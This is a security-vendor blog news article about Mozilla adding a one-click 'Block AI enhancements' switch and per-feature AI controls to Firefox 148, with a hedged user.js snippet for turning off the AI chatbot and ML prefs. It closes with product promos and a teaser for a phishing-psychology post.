We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Firefox is giving users the AI off switch

4 February 2026 at 13:07

Some software providers have decided to lead by example and offer users a choice about the Artificial Intelligence (AI) features built into their products.

The latest example is Mozilla, which now offers users a one-click option to disable generative AI features in the Firefox browser.

Audiences are divided about the use of AI, or as Mozilla put it on their blog:

“AI is changing the web, and people want very different things from it. We’ve heard from many who want nothing to do with AI. We’ve also heard from others who want AI tools that are genuinely useful. Listening to our community, alongside our ongoing commitment to offer choice, led us to build AI controls.”

Mozilla is adding an AI Controls area to Firefox settings that centralizes the management of all generative AI features. This consists mainly of a master switch, “Block AI enhancements,” which lets users effectively run Firefox “without AI.” It blocks existing and future generative AI features and hides pop‑ups or prompts advertising them.

Once you set your AI preferences in Firefox, they stay in place across updates. You can also change them whenever you want.

Starting with Firefox 148, which rolls out on February 24, you’ll find a new AI controls section within the desktop browser settings.

Firefox AI choices
Image courtesy of Mozilla

You can turn everything off with one click or take a more granular approach. At launch, these features can be controlled individually:

  • Translations, which help you browse the web in your preferred language.
  • Alt text in PDFs, which adds accessibility descriptions to images in PDF pages.
  • AI-enhanced tab grouping, which suggests related tabs and group names.
  • Link previews, which show key points before you open a link.
  • An AI chatbot in the sidebar, which lets you use your chosen chatbot as you browse, including options like Anthropic Claude, ChatGPT, Microsoft Copilot, Google Gemini and Le Chat Mistral.
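
For users who don’t want to wait for the consolidated panel, a couple of about:config preferences already gate the most visible of these features in current desktop releases. This is a hedged sketch in user.js form: the pref names are as observed in recent Firefox versions, may change, and should be superseded by the supported AI Controls panel once Firefox 148 ships.

// Hedged sketch: pin these in user.js (or flip them in about:config).
// Pref names as observed in recent Firefox releases; subject to change.
user_pref("browser.ml.chat.enabled", false); // sidebar AI chatbot
user_pref("browser.ml.enable", false);       // on-device ML features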

We applaud this move to give users more control. Other companies have done the same, including Mozilla’s competitor DuckDuckGo, which made AI optional after putting the decision to a user vote. Earlier, browser developer Vivaldi took a stand against incorporating AI altogether.

Open-source email service Tuta also decided not to integrate AI features. After only 3% of Tuta users requested them, Tuta removed an AI copilot from its development roadmap.

Even Microsoft seems to have recoiled from pushing AI to everyone, although so far it has focused on walking back defaults and tightening per‑feature controls rather than offering a single, global off switch.

Choices

Many people are happy to use AI features, and as long as you’re aware of the risks and the pitfalls, that’s fine. But pushing these features on users who don’t want them is likely to backfire on software publishers.

Which is only right. After all, you’re paying the bill, so you should have a choice. Before installing a new browser, inform yourself not only about its privacy policy, but also about what control you’ll have over AI features.

Looking at recent voting results, I think it’s safe to say that in the AI gold rush, the real premium feature isn’t a chatbot button—it’s the off switch.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Why Smart People Fall For Phishing Attacks

4 February 2026 at 01:00

Why do successful phishing attacks target our psychology rather than just our software? Discover Unit 42’s latest insights on defeating social engineering and securing your digital life.

The post Why Smart People Fall For Phishing Attacks appeared first on Unit 42.
